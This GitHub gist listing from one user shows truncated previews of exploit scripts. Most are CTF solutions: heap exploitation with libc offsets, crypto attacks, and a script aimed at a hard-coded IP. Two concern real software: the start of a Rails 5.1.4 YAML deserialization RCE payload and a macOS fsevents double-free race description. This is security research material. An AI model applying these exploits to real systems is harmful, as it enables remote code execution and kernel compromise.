Skip to content

Instantly share code, notes, and snippets.

Niklas Baumstark niklasb

Block or report user

Report or block niklasb

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@niklasb
niklasb / gist:b5280bc856bfc94157b760eb962e7b60
Created Dec 31, 2018 — forked from wmliang/gist:36b3e6a8d59875cc9f2b20a952bb8890
35c3ctf pwndb exploit
View gist:b5280bc856bfc94157b760eb962e7b60
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
@niklasb
niklasb / railspwn.rb
Last active Jul 23, 2019
Rails 5.1.4 YAML unsafe deserialization RCE payload
View railspwn.rb
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
@niklasb
niklasb / gracias.py
Last active Jul 15, 2019
Crypto solutions ASIS CTF finals
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777
@niklasb
niklasb / handicraft.py
Created Sep 10, 2017
View handicraft.py
from sage.all import *
import base64
def factor(n,b):
M=1
print 'start'
a = 2
i=0
for q in primes(b):
i+=1
@niklasb
niklasb / gracias.py
Last active Oct 10, 2018
View gracias.py
from sage.all import continued_fraction, Integer, inverse_mod
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777
@niklasb
niklasb / ctfzone_pwn.py
Created Jul 18, 2017
View ctfzone_pwn.py
# First stage: unsafe unlink
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption
from pwn import *
import struct
import sys
offset_close = 0x00000000000f78b0
offset_env = 0x3c6f38
@niklasb
niklasb / sigserver.py
Created Jul 17, 2017
Solution for signature server from CTFZone 2017
View sigserver.py
# Implementation based on attack from
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf
import socket
import telnetlib
import random
from hashlib import sha1
from sage.all import inverse_mod, matrix, vector
TARGET = ('185.143.173.36', 1337)
sock=socket.create_connection(TARGET)
@niklasb
niklasb / gist:416b333cb973812b39c085a42f5c19c4
Last active Apr 3, 2017
View gist:416b333cb973812b39c085a42f5c19c4
The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0.
static int
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx)
{
fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data;
int ret = 0;
fsevent_dev_filter_args64 *devfilt_args, _devfilt_args;
OSAddAtomic(1, &fseh->active);
@niklasb
niklasb / robot_pwnage.py
Last active Aug 6, 2017
Exploit for 'wheel of robots' from insomni'hack 2017
View robot_pwnage.py
import time
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py
from pwnlib.tools import *
TARGET=('localhost',5000)
INTERVAL=0
offset_free = 549184
offset_system = 0x456d0
@niklasb
niklasb / baby.py
Created Jan 22, 2017
exploit for 'baby' from Insomni'Hack Teaser 2017
View baby.py
import socket
import telnetlib
import time
import struct
import sys
TARGET=('localhost', 1337)
offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0
You can’t perform that action at this time.